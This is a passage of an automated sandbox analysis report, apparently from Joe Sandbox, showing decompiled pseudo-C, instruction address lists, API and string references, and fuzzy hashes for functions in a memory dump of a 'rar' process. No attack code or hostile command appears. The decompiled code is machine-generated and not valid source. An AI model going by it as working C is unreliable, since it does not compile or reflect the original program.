				if ( *((intOrPtr*)(_t326 + 0x58)) <= 0) goto 0x50b4b54d;
				_t410 =  *((intOrPtr*)(r14d * 0x1020 +  *_t326));
				if (0 -  *(_t326 + 0x50) < 0) goto 0x50b4b534;
				r8d = 0;
				 *0x50b80550();
				r9b = 1;
				r8d = 0;
				E00007FF67FF650B4DC8C( *((intOrPtr*)(_t401 + 0x1008)), 0, _t263, 0 -  *(_t326 + 0x50),  *((intOrPtr*)( *( *((intOrPtr*)(r14d * 0x1020 +  *_t326))) + 0x20)), _t326, _t326,  *((intOrPtr*)(r14d * 0x1020 +  *_t326)), _t401,  *((intOrPtr*)(r14d * 0x1020 +  *_t326)), _t444, _t437, _t412);
				 *0x50b80550();
				if (1 -  *((intOrPtr*)(_t326 + 0x58)) < 0) goto 0x50b4b4f9;
				_t402 =  *((intOrPtr*)(_t416 + 0x50));
				if ( *((intOrPtr*)(_t402 + 0x7154)) != sil) goto 0x50b4b567;
				E00007FF67FF650B283F0(0x50b84ad0,  *((intOrPtr*)(r14d * 0x1020 +  *_t326)), _t444, _t437);
				if ( *((intOrPtr*)(_t402 + 0x7156)) != sil) goto 0x50b4b583;
				E00007FF67FF650B54598(0xd28, 1, _t326,  *((intOrPtr*)(r14d * 0x1020 +  *_t326)), _t413, _t444);
				return E00007FF67FF650B69D10(E00007FF67FF650B55FBC(E00007FF67FF650B283F0( *((intOrPtr*)( *_t410 + 0x10)),  *((intOrPtr*)(r14d * 0x1020 +  *_t326)), _t444, _t437), 0,  *((intOrPtr*)( *_t410 + 0x10)), _t326, _t416 + 0x70,  *((intOrPtr*)(r14d * 0x1020 +  *_t326)), _t444, _t437), 0xd28,  *(_t413 + 0x4010) ^ _t416);
			}



















































                                                                                                            0x7ff650b4af80
                                                                                                            0x7ff650b4af80
                                                                                                            0x7ff650b4af80
                                                                                                            0x7ff650b4af90
                                                                                                            0x7ff650b4af9d
                                                                                                            0x7ff650b4afa2
                                                                                                            0x7ff650b4afa5
                                                                                                            0x7ff650b4afac
                                                                                                            0x7ff650b4afaf
                                                                                                            0x7ff650b4afb6
                                                                                                            0x7ff650b4afbc
                                                                                                            0x7ff650b4afc1
                                                                                                            0x7ff650b4afc4
                                                                                                            0x7ff650b4afd4
                                                                                                            0x7ff650b4afd9
                                                                                                            0x7ff650b4afdc
                                                                                                            0x7ff650b4afdf
                                                                                                            0x7ff650b4afee
                                                                                                            0x7ff650b4aff4
                                                                                                            0x7ff650b4afff
                                                                                                            0x7ff650b4b00a
                                                                                                            0x7ff650b4b00f
                                                                                                            0x7ff650b4b017
                                                                                                            0x7ff650b4b01c
                                                                                                            0x7ff650b4b024
                                                                                                            0x7ff650b4b026
                                                                                                            0x7ff650b4b029
                                                                                                            0x7ff650b4b036
                                                                                                            0x7ff650b4b03b
                                                                                                            0x7ff650b4b042
                                                                                                            0x7ff650b4b049
                                                                                                            0x7ff650b4b050
                                                                                                            0x7ff650b4b05c
                                                                                                            0x7ff650b4b068
                                                                                                            0x7ff650b4b070
                                                                                                            0x7ff650b4b078
                                                                                                            0x7ff650b4b07c
                                                                                                            0x7ff650b4b087
                                                                                                            0x7ff650b4b096
                                                                                                            0x7ff650b4b09c
                                                                                                            0x7ff650b4b0a6
                                                                                                            0x7ff650b4b0a9
                                                                                                            0x7ff650b4b0ac
                                                                                                            0x7ff650b4b0b5
                                                                                                            0x7ff650b4b0b7
                                                                                                            0x7ff650b4b0c5
                                                                                                            0x7ff650b4b0ca
                                                                                                            0x7ff650b4b0d2
                                                                                                            0x7ff650b4b0d8
                                                                                                            0x7ff650b4b0e2
                                                                                                            0x7ff650b4b0fe
                                                                                                            0x7ff650b4b100
                                                                                                            0x7ff650b4b102
                                                                                                            0x7ff650b4b105
                                                                                                            0x7ff650b4b10b
                                                                                                            0x7ff650b4b10f
                                                                                                            0x7ff650b4b111
                                                                                                            0x7ff650b4b116
                                                                                                            0x7ff650b4b119
                                                                                                            0x7ff650b4b121
                                                                                                            0x7ff650b4b123
                                                                                                            0x7ff650b4b131
                                                                                                            0x7ff650b4b13e
                                                                                                            0x7ff650b4b14d
                                                                                                            0x7ff650b4b152
                                                                                                            0x7ff650b4b156
                                                                                                            0x7ff650b4b15c
                                                                                                            0x7ff650b4b166
                                                                                                            0x7ff650b4b16e
                                                                                                            0x7ff650b4b177
                                                                                                            0x7ff650b4b17c
                                                                                                            0x7ff650b4b17f
                                                                                                            0x7ff650b4b17f
                                                                                                            0x7ff650b4b18d
                                                                                                            0x7ff650b4b18f
                                                                                                            0x7ff650b4b18f
                                                                                                            0x7ff650b4b19d
                                                                                                            0x7ff650b4b19f
                                                                                                            0x7ff650b4b1a2
                                                                                                            0x7ff650b4b1a5
                                                                                                            0x7ff650b4b1af
                                                                                                            0x7ff650b4b1b3
                                                                                                            0x7ff650b4b1b8
                                                                                                            0x7ff650b4b1bf
                                                                                                            0x7ff650b4b1c7
                                                                                                            0x7ff650b4b1cb
                                                                                                            0x7ff650b4b1cf
                                                                                                            0x7ff650b4b1f0
                                                                                                            0x7ff650b4b1fa
                                                                                                            0x7ff650b4b1ff
                                                                                                            0x7ff650b4b207
                                                                                                            0x7ff650b4b20c
                                                                                                            0x7ff650b4b214
                                                                                                            0x7ff650b4b216
                                                                                                            0x7ff650b4b219
                                                                                                            0x7ff650b4b220
                                                                                                            0x7ff650b4b227
                                                                                                            0x7ff650b4b22c
                                                                                                            0x7ff650b4b23b
                                                                                                            0x7ff650b4b240
                                                                                                            0x7ff650b4b245
                                                                                                            0x7ff650b4b261
                                                                                                            0x7ff650b4b269
                                                                                                            0x7ff650b4b279
                                                                                                            0x7ff650b4b284
                                                                                                            0x7ff650b4b296
                                                                                                            0x7ff650b4b29f
                                                                                                            0x7ff650b4b2ab
                                                                                                            0x7ff650b4b2b4
                                                                                                            0x7ff650b4b2bf
                                                                                                            0x7ff650b4b2c4
                                                                                                            0x7ff650b4b2c9
                                                                                                            0x7ff650b4b2cd
                                                                                                            0x7ff650b4b2d6
                                                                                                            0x7ff650b4b2e7
                                                                                                            0x7ff650b4b2f8
                                                                                                            0x7ff650b4b2fd
                                                                                                            0x7ff650b4b301
                                                                                                            0x7ff650b4b30d
                                                                                                            0x7ff650b4b316
                                                                                                            0x7ff650b4b322
                                                                                                            0x7ff650b4b32c
                                                                                                            0x7ff650b4b332
                                                                                                            0x7ff650b4b335
                                                                                                            0x7ff650b4b341
                                                                                                            0x7ff650b4b34e
                                                                                                            0x7ff650b4b353
                                                                                                            0x7ff650b4b35d
                                                                                                            0x7ff650b4b361
                                                                                                            0x7ff650b4b364
                                                                                                            0x7ff650b4b369
                                                                                                            0x7ff650b4b371
                                                                                                            0x7ff650b4b37a
                                                                                                            0x7ff650b4b388
                                                                                                            0x7ff650b4b39c
                                                                                                            0x7ff650b4b3a2
                                                                                                            0x7ff650b4b3b7
                                                                                                            0x7ff650b4b3bd
                                                                                                            0x7ff650b4b3c2
                                                                                                            0x7ff650b4b3c5
                                                                                                            0x7ff650b4b3d3
                                                                                                            0x7ff650b4b3e0
                                                                                                            0x7ff650b4b3ee
                                                                                                            0x7ff650b4b3f7
                                                                                                            0x7ff650b4b3fc
                                                                                                            0x7ff650b4b405
                                                                                                            0x7ff650b4b40a
                                                                                                            0x7ff650b4b411
                                                                                                            0x7ff650b4b41c
                                                                                                            0x7ff650b4b426
                                                                                                            0x7ff650b4b431
                                                                                                            0x7ff650b4b437
                                                                                                            0x7ff650b4b43d
                                                                                                            0x7ff650b4b447
                                                                                                            0x7ff650b4b450
                                                                                                            0x7ff650b4b471
                                                                                                            0x7ff650b4b47d
                                                                                                            0x7ff650b4b493
                                                                                                            0x7ff650b4b499
                                                                                                            0x7ff650b4b4a0
                                                                                                            0x7ff650b4b4a9
                                                                                                            0x7ff650b4b4b9
                                                                                                            0x7ff650b4b4c7
                                                                                                            0x7ff650b4b4cd
                                                                                                            0x7ff650b4b4dc
                                                                                                            0x7ff650b4b4e1
                                                                                                            0x7ff650b4b4eb
                                                                                                            0x7ff650b4b4f7
                                                                                                            0x7ff650b4b505
                                                                                                            0x7ff650b4b50c
                                                                                                            0x7ff650b4b511
                                                                                                            0x7ff650b4b51d
                                                                                                            0x7ff650b4b523
                                                                                                            0x7ff650b4b526
                                                                                                            0x7ff650b4b52f
                                                                                                            0x7ff650b4b53e
                                                                                                            0x7ff650b4b549
                                                                                                            0x7ff650b4b54d
                                                                                                            0x7ff650b4b559
                                                                                                            0x7ff650b4b562
                                                                                                            0x7ff650b4b56e
                                                                                                            0x7ff650b4b575
                                                                                                            0x7ff650b4b5b6

                                                                                                            APIs
                                                                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF650B4B1F0
                                                                                                              • Part of subcall function 00007FF650B5B008: Sleep.KERNEL32(?,?,?,?,00007FF650B2CAD1,?,00000000,00000001,00007FF650B57541), ref: 00007FF650B5B068
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleepswprintf
                                                                                                            • String ID: $%ls%0*u.rev
                                                                                                            • API String ID: 407366315-3491873314
                                                                                                            • Opcode ID: 3b2c035649105b4ee14b4dac2b41360537a1878a71ebb3d7ef1787ddd1d70d3a
                                                                                                            • Instruction ID: 09af1649ab72c42413706370d4f4ff7860329c9e626064ccf457f5d73ce51d56
                                                                                                            • Opcode Fuzzy Hash: 3b2c035649105b4ee14b4dac2b41360537a1878a71ebb3d7ef1787ddd1d70d3a
                                                                                                            • Instruction Fuzzy Hash: 72F1E532A08683A6EB24DF25D4905BD67A2FF46B84F480035DF8EA7799DE3EE544C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B17B2A Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 316COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E00007FF67FF650B17B2A(intOrPtr* __rbx, void* __r8, void* __r9, void* __r13, void* __r14, signed int __r15) {
				char _t120;
				void* _t128;
				void* _t135;
				void* _t136;
				void* _t138;
				void* _t141;
				void* _t154;
				intOrPtr _t156;
				void* _t157;
				void* _t165;
				intOrPtr _t166;
				signed int _t176;
				void* _t193;
				void* _t194;
				intOrPtr _t236;
				long long _t239;
				intOrPtr _t240;
				long long _t243;
				intOrPtr* _t260;
				intOrPtr* _t268;
				intOrPtr* _t269;
				void* _t294;
				intOrPtr _t307;
				long long* _t309;
				void* _t312;
				long long _t317;
				void* _t321;
				void* _t323;
				void* _t330;
				void* _t332;
				void* _t333;
				void* _t335;

				_t330 = __r9;
				_t325 = __r8;
				_t260 = __rbx;
				if (__r15 != 0) goto 0x50b17b37;
				r12b = r13b;
				if (__r14 == 0) goto 0x50b17b3a;
				r12b = 1;
				_t236 =  *((intOrPtr*)(__rbx + 0x22d8));
				if ( *((intOrPtr*)(_t236 + 0x6130)) == r13b) goto 0x50b17b79;
				if (__r15 != 0) goto 0x50b17b57;
				if (__r14 == 0) goto 0x50b17b79;
				if ((dil & 0x00000004) != 0) goto 0x50b17b75;
				if ((dil & 0x00000008) == 0) goto 0x50b17b79;
				if ( *((intOrPtr*)(_t236 + 0x6132)) != r13b) goto 0x50b17b75;
				if ( *((intOrPtr*)(__rbx + 0x7f84)) == r13b) goto 0x50b17b79;
				goto 0x50b17b7c;
				_t120 = r13b;
				 *((char*)(_t321 + 0x6f)) = _t120;
				_t166 =  *((intOrPtr*)(__rbx + 0x7f78));
				if (_t166 != 3) goto 0x50b17b93;
				sil = 1;
				if ((dil & 0x00000002) == 0) goto 0x50b17b96;
				sil = r13b;
				 *((intOrPtr*)(_t321 + 0x57)) = sil;
				if (_t120 == 0) goto 0x50b17bf4;
				 *((char*)(__rbx + 0x692b)) = 1;
				 *((char*)(__rbx + 0x6930)) = 1;
				if (_t166 != 3) goto 0x50b17bd9;
				E00007FF67FF650B29B14(__rbx, __rbx + 0x6941, _t294, _t312, __r8);
				 *((intOrPtr*)(_t260 + 0x697c)) = 0xf;
				 *((char*)(_t260 + 0x6951)) = 1;
				asm("movups xmm0, [ebx+0x7f92]");
				asm("movdqu [ebx+0x6931], xmm0");
				_t238 =  ~__r15;
				_t21 = _t238 + 0x15; // 0x32
				_t176 = _t21;
				_t124 =  ==  ? _t176 : 0x1d;
				 *((intOrPtr*)(_t260 + 0x589c)) =  ==  ? _t176 : 0x1d;
				if (__r14 == 0) goto 0x50b17c17;
				E00007FF67FF650B320B8(_t260, __r14, _t312);
				goto 0x50b17c1a;
				_t239 = __r15 +  ~__r15;
				 *((long long*)(_t260 + 0x68e8)) = _t239;
				 *((long long*)(_t260 + 0x68f0)) = _t239;
				r8d = 0;
				E00007FF67FF650B14074(_t176 & 0xffffff00 | __r14 != 0x00000000, _t239);
				 *((long long*)(_t260 + 0x68f8)) = _t239;
				_t128 =  ==  ? 0x20000 : 0x10000;
				 *((long long*)(_t321 - 0x19)) = _t239;
				 *((long long*)(_t260 + 0x6988)) = _t239;
				if (r12b == 0) goto 0x50b17c6d;
				if (sil == 0) goto 0x50b17c70;
				 *((char*)(_t260 + 0x58a0)) = r13b;
				if ( *((intOrPtr*)(_t260 + 0x7f78)) != 2) goto 0x50b17c8a;
				_t295 = _t260 + 0x68d0;
				E00007FF67FF650B32164(_t260, _t260 + 0x68d0);
				 *((intOrPtr*)(_t260 + 0x6994)) = r13d;
				 *((intOrPtr*)(_t323 + 0x20)) = r13b;
				r9b = 1;
				r8d = 0;
				_t35 = _t325 + 3; // 0x3
				E00007FF67FF650B1B4D8(_t35, _t239, _t260, _t260 + 0x68d0, __r8, _t333, _t335);
				_t240 =  *((intOrPtr*)(_t260 + 0x22d8));
				if ( *((intOrPtr*)(_t240 + 0x7178)) == __r13) goto 0x50b17cf6;
				if ( *((intOrPtr*)(_t260 + 0x7fc0)) == r13b) goto 0x50b17cf6;
				if ((dil & 0x00000001) == 0) goto 0x50b17cf6;
				 *((char*)(_t321 - 0x29)) = 1;
				if ( *((intOrPtr*)(_t260 + 0x7fa8)) - _t240 >= 0) goto 0x50b17d08;
				r9d = 0;
				_t135 = E00007FF67FF650B692C4(0, _t193, _t194, _t240, _t260, _t260 + 0x68d0, _t321 - 0x21, _t330, _t333, _t335);
				goto 0x50b17d08;
				 *((intOrPtr*)(_t321 - 0x29)) = r13b;
				_t309 = _t260 + 0x7fa8;
				r13d =  *((intOrPtr*)(_t260 + 0x588c));
				_t268 = _t260;
				_t136 = E00007FF67FF650B18DA0(_t135, r13d, _t268, _t260 + 0x68d0);
				_t317 =  <=  ? _t268 :  *_t309 - _t240;
				 *_t309 = _t317;
				if ( *((intOrPtr*)(_t260 + 0x34be)) == 0) goto 0x50b17d58;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t260 + 0x22d8)) + 0x2018)) == 0) goto 0x50b17d58;
				_t269 = _t260;
				E00007FF67FF650B18DA0(_t136, r13d, _t269, _t260 + 0x68d0);
				 *_t309 = _t317 - _t269;
				 *((intOrPtr*)(_t323 + 0x20)) = r12b;
				r9d = 0;
				r8d = 0;
				_t53 = _t330 + 3; // 0x3
				_t138 = E00007FF67FF650B1B4D8(_t53,  *((intOrPtr*)(_t260 + 0x22d8)), _t260, _t260 + 0x68d0, _t321 - 0x21, _t333, _t335);
				if (r12b == 0) goto 0x50b1803f;
				_t310 = _t260 + 0x2100;
				E00007FF67FF650B495A8(_t138,  *((intOrPtr*)(_t260 + 0x22d8)), _t260 + 0x2100, _t295);
				r8d =  *((intOrPtr*)( *((intOrPtr*)(_t260 + 0x22d8)) + 0x9518));
				E00007FF67FF650B366EC( *((intOrPtr*)(_t260 + 0x6900)), _t260, _t260 + 0x2288, _t317 - _t269, _t333, _t335);
				_t243 =  *((intOrPtr*)(_t260 + 0x22d8));
				r8d =  *((intOrPtr*)(_t243 + 0x9518));
				_t141 = E00007FF67FF650B366EC( *((intOrPtr*)(_t260 + 0x6900)), _t260, _t260 + 0x2268, _t317 - _t269, _t333, _t335);
				if ( *((intOrPtr*)(_t260 + 0x7f78)) != 3) goto 0x50b17df0;
				E00007FF67FF650B15520(_t141,  *((intOrPtr*)(_t260 + 0x68f8)),  *((intOrPtr*)(_t260 + 0x68f0)), _t321 - 0x21);
				 *((long long*)(_t260 + 0x2248)) = _t243;
				sil =  *((intOrPtr*)(_t321 + 0x57));
				if ( *((long long*)(_t260 + 0x2300)) != 0) goto 0x50b17ea1;
				if (sil != 0) goto 0x50b17ea1;
				if ( *((intOrPtr*)(_t260 + 0x7f78)) != 3) goto 0x50b17e3b;
				E00007FF67FF650B69B58(_t243,  *((intOrPtr*)(_t260 + 0x68f8)));
				 *((long long*)(_t321 + 0x57)) = _t243;
				if (_t243 == 0) goto 0x50b17e37;
				E00007FF67FF650B38D08(_t243, _t260, _t243, _t260 + 0x2100);
				goto 0x50b17e39;
				goto 0x50b17e60;
				E00007FF67FF650B69B58(_t243, _t243);
				 *((long long*)(_t321 + 0x57)) = _t243;
				if (_t243 == 0) goto 0x50b17e5e;
				E00007FF67FF650B3D1F8(_t243, _t260, _t243, _t260 + 0x2100);
				goto 0x50b17e60;
				 *((long long*)(_t260 + 0x2300)) = _t243;
				 *0x50b80550();
				if ( *0x50b80550() == 0) goto 0x50b1805a;
				if ( *((char*)(_t321 + 0x6f)) == 0) goto 0x50b17f0b;
				_t332 =  *((intOrPtr*)(_t260 + 0x22d8)) + 0x6030;
				asm("inc ebp");
				r8d = r8d + 5;
				 *((long long*)(_t323 + 0x40)) = _t260 + 0x6952;
				 *((long long*)(_t323 + 0x38)) = _t260 + 0x695b;
				 *((intOrPtr*)(_t323 + 0x30)) =  *((intOrPtr*)(_t260 + 0x697c));
				 *((long long*)(_t323 + 0x28)) = _t260 + 0x6941;
				 *((long long*)(_t323 + 0x20)) = _t260 + 0x6931;
				E00007FF67FF650B49B40(1, _t260 + 0x2100);
				 *((char*)(_t260 + 0x21b0)) = 0;
				_t154 = E00007FF67FF650B49BBC( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t260 + 0x2300)))) + 8)), _t260 + 0x2100, __r14, _t260);
				if ( *((char*)(_t321 - 0x29)) == 0) goto 0x50b17f46;
				 *((char*)(_t260 + 0x2212)) = 1;
				 *((long long*)(_t260 + 0x21d0)) = _t260 + 0x5880;
				 *((long long*)(_t260 + 0x21d8)) = _t321 - 0x21;
				if (__r14 != 0) goto 0x50b17f5a;
				E00007FF67FF650B49BF4(_t154, _t310,  *((intOrPtr*)(_t321 + 0x5f)), __r15 +  ~__r15);
				r14d = 0;
				if (sil == 0) goto 0x50b17fa3;
				_t156 = E00007FF67FF650B11344(_t321 - 0x21, _t321 - 0x11);
				goto 0x50b17f85;
				r8d = _t156;
				_t157 = E00007FF67FF650B498C8(_t156, _t165, 0,  *((intOrPtr*)(_t321 + 0x7f)), _t193, _t260, _t310,  *((intOrPtr*)(_t321 - 0x11)), _t310,  *((intOrPtr*)(_t321 - 0x11)), __r15 +  ~__r15, _t332, _t260 + 0x6941, __r14);
				0x50b4967c();
				if (_t157 != 0) goto 0x50b17f77;
				E00007FF67FF650B11534(_t321 - 0x11);
				goto 0x50b17fd4;
				r9d = 0;
				r8d = _t332 + 2;
				 *0x50b80550();
				 *0x50b80550();
				 *((long long*)(_t260 + 0x68f0)) =  *((intOrPtr*)(_t260 + 0x2218));
				 *((long long*)(_t260 + 0x68e8)) =  *((intOrPtr*)(_t260 + 0x2220));
				E00007FF67FF650B3679C(0, _t260 + 0x2288, _t260 + 0x6900,  *((intOrPtr*)(_t321 - 0x11)), _t321, _t332, _t260 + 0x6941);
				r8d = 0;
				_t307 =  *((intOrPtr*)(_t321 - 0x21));
				 *0x50b80550();
				 *((intOrPtr*)(_t323 + 0x20)) = r14b;
				r9d = 0;
				r8d = 0;
				_t115 = _t332 + 3; // 0x3
				E00007FF67FF650B1B4D8(_t115,  *((intOrPtr*)( *_t260 + 0x20)), _t260, _t307,  *((intOrPtr*)(_t321 - 9)), _t260 + 0x6941, _t260 + 0x6931);
				_t116 = _t307 + 2; // 0x2
				r8d = _t116;
				return  *0x50b80550();
			}



































                                                                                                            0x7ff650b17b2a
                                                                                                            0x7ff650b17b2a
                                                                                                            0x7ff650b17b2a
                                                                                                            0x7ff650b17b2d
                                                                                                            0x7ff650b17b32
                                                                                                            0x7ff650b17b35
                                                                                                            0x7ff650b17b37
                                                                                                            0x7ff650b17b3a
                                                                                                            0x7ff650b17b4b
                                                                                                            0x7ff650b17b50
                                                                                                            0x7ff650b17b55
                                                                                                            0x7ff650b17b5b
                                                                                                            0x7ff650b17b61
                                                                                                            0x7ff650b17b6a
                                                                                                            0x7ff650b17b73
                                                                                                            0x7ff650b17b77
                                                                                                            0x7ff650b17b79
                                                                                                            0x7ff650b17b7c
                                                                                                            0x7ff650b17b7f
                                                                                                            0x7ff650b17b88
                                                                                                            0x7ff650b17b8e
                                                                                                            0x7ff650b17b91
                                                                                                            0x7ff650b17b93
                                                                                                            0x7ff650b17b96
                                                                                                            0x7ff650b17b9c
                                                                                                            0x7ff650b17b9e
                                                                                                            0x7ff650b17ba5
                                                                                                            0x7ff650b17baf
                                                                                                            0x7ff650b17bbd
                                                                                                            0x7ff650b17bc2
                                                                                                            0x7ff650b17bcc
                                                                                                            0x7ff650b17bd9
                                                                                                            0x7ff650b17be0
                                                                                                            0x7ff650b17beb
                                                                                                            0x7ff650b17bf9
                                                                                                            0x7ff650b17bf9
                                                                                                            0x7ff650b17bff
                                                                                                            0x7ff650b17c02
                                                                                                            0x7ff650b17c0b
                                                                                                            0x7ff650b17c10
                                                                                                            0x7ff650b17c15
                                                                                                            0x7ff650b17c17
                                                                                                            0x7ff650b17c1a
                                                                                                            0x7ff650b17c21
                                                                                                            0x7ff650b17c2e
                                                                                                            0x7ff650b17c34
                                                                                                            0x7ff650b17c39
                                                                                                            0x7ff650b17c53
                                                                                                            0x7ff650b17c56
                                                                                                            0x7ff650b17c5a
                                                                                                            0x7ff650b17c64
                                                                                                            0x7ff650b17c6b
                                                                                                            0x7ff650b17c70
                                                                                                            0x7ff650b17c79
                                                                                                            0x7ff650b17c7b
                                                                                                            0x7ff650b17c85
                                                                                                            0x7ff650b17c8a
                                                                                                            0x7ff650b17c91
                                                                                                            0x7ff650b17c96
                                                                                                            0x7ff650b17c99
                                                                                                            0x7ff650b17c9c
                                                                                                            0x7ff650b17ca3
                                                                                                            0x7ff650b17ca8
                                                                                                            0x7ff650b17cb6
                                                                                                            0x7ff650b17cbf
                                                                                                            0x7ff650b17cc5
                                                                                                            0x7ff650b17cc7
                                                                                                            0x7ff650b17ce1
                                                                                                            0x7ff650b17ce3
                                                                                                            0x7ff650b17cef
                                                                                                            0x7ff650b17cf4
                                                                                                            0x7ff650b17cf6
                                                                                                            0x7ff650b17d01
                                                                                                            0x7ff650b17d08
                                                                                                            0x7ff650b17d0e
                                                                                                            0x7ff650b17d11
                                                                                                            0x7ff650b17d26
                                                                                                            0x7ff650b17d2a
                                                                                                            0x7ff650b17d33
                                                                                                            0x7ff650b17d42
                                                                                                            0x7ff650b17d47
                                                                                                            0x7ff650b17d4a
                                                                                                            0x7ff650b17d55
                                                                                                            0x7ff650b17d58
                                                                                                            0x7ff650b17d5d
                                                                                                            0x7ff650b17d60
                                                                                                            0x7ff650b17d63
                                                                                                            0x7ff650b17d6a
                                                                                                            0x7ff650b17d72
                                                                                                            0x7ff650b17d78
                                                                                                            0x7ff650b17d82
                                                                                                            0x7ff650b17d9c
                                                                                                            0x7ff650b17daa
                                                                                                            0x7ff650b17daf
                                                                                                            0x7ff650b17dbd
                                                                                                            0x7ff650b17dc8
                                                                                                            0x7ff650b17dd4
                                                                                                            0x7ff650b17de4
                                                                                                            0x7ff650b17de9
                                                                                                            0x7ff650b17df0
                                                                                                            0x7ff650b17dfc
                                                                                                            0x7ff650b17e05
                                                                                                            0x7ff650b17e12
                                                                                                            0x7ff650b17e19
                                                                                                            0x7ff650b17e1e
                                                                                                            0x7ff650b17e25
                                                                                                            0x7ff650b17e2d
                                                                                                            0x7ff650b17e35
                                                                                                            0x7ff650b17e39
                                                                                                            0x7ff650b17e40
                                                                                                            0x7ff650b17e45
                                                                                                            0x7ff650b17e4c
                                                                                                            0x7ff650b17e54
                                                                                                            0x7ff650b17e5c
                                                                                                            0x7ff650b17e60
                                                                                                            0x7ff650b17e7b
                                                                                                            0x7ff650b17e9b
                                                                                                            0x7ff650b17ea5
                                                                                                            0x7ff650b17eca
                                                                                                            0x7ff650b17edc
                                                                                                            0x7ff650b17edf
                                                                                                            0x7ff650b17ee3
                                                                                                            0x7ff650b17ee8
                                                                                                            0x7ff650b17ef3
                                                                                                            0x7ff650b17ef7
                                                                                                            0x7ff650b17efc
                                                                                                            0x7ff650b17f06
                                                                                                            0x7ff650b17f0b
                                                                                                            0x7ff650b17f1b
                                                                                                            0x7ff650b17f24
                                                                                                            0x7ff650b17f26
                                                                                                            0x7ff650b17f34
                                                                                                            0x7ff650b17f3f
                                                                                                            0x7ff650b17f49
                                                                                                            0x7ff650b17f55
                                                                                                            0x7ff650b17f5a
                                                                                                            0x7ff650b17f60
                                                                                                            0x7ff650b17f6b
                                                                                                            0x7ff650b17f75
                                                                                                            0x7ff650b17f77
                                                                                                            0x7ff650b17f80
                                                                                                            0x7ff650b17f8f
                                                                                                            0x7ff650b17f96
                                                                                                            0x7ff650b17f9c
                                                                                                            0x7ff650b17fa1
                                                                                                            0x7ff650b17fad
                                                                                                            0x7ff650b17fb2
                                                                                                            0x7ff650b17fba
                                                                                                            0x7ff650b17fce
                                                                                                            0x7ff650b17fdb
                                                                                                            0x7ff650b17fe9
                                                                                                            0x7ff650b17ff6
                                                                                                            0x7ff650b17ffe
                                                                                                            0x7ff650b18001
                                                                                                            0x7ff650b1800c
                                                                                                            0x7ff650b18012
                                                                                                            0x7ff650b18017
                                                                                                            0x7ff650b1801a
                                                                                                            0x7ff650b1801d
                                                                                                            0x7ff650b18024
                                                                                                            0x7ff650b1802e
                                                                                                            0x7ff650b1802e
                                                                                                            0x7ff650b18059

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 08$i7
                                                                                                            • API String ID: 0-3044145403
                                                                                                            • Opcode ID: 1d2db15e635fd5b5004f6720a9af26da77b807d4a72eccbbd98c59b77941cbe4
                                                                                                            • Instruction ID: 84f7b941577f4ae5a971e2617ed21aaeb8b52f887e31d9b09b3dd17c5b9a832f
                                                                                                            • Opcode Fuzzy Hash: 1d2db15e635fd5b5004f6720a9af26da77b807d4a72eccbbd98c59b77941cbe4
                                                                                                            • Instruction Fuzzy Hash: EEE1AF32A08687A5EB10DF25D5902FE27B1EB46B88F4C4035DE0EAB799DF3AE555C310
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

